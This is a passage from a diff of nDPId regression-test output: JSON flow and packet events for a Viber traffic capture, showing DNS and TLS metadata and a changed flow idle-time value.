Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1527155641574,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1527155641574,"pkt":"AA6OMNv9MAdNo1+nCABFAABBH3ZAAEARmcXAqAARwKgAD5IqADUALZxVyU0BAAABAAAAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAQ=="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1527155641691,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641691,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXEZAAEARXIvAqAAPwKgAEQA1kioAlzNhyU2BgAABAAUAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAcAMAAUAAQAACsAAHg1kbzJneTJrd2FrOWsyCmNsb3VkZnJvbnQDbmV0AMAxAAEAAQAAADsABDbmXWDAMQABAAEAAAA7AAQ25l2mwDEAAQABAAAAOwAENuZdIsAxAAEAAQAAADsABDbmXaA="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1527155641813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155641813,"pkt":"AA6OMNv9MAdNo1+nCABFAABAH5VAAEARmafAqAARwKgAD539ADUALISKl70BAAABAAAAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQAB"} 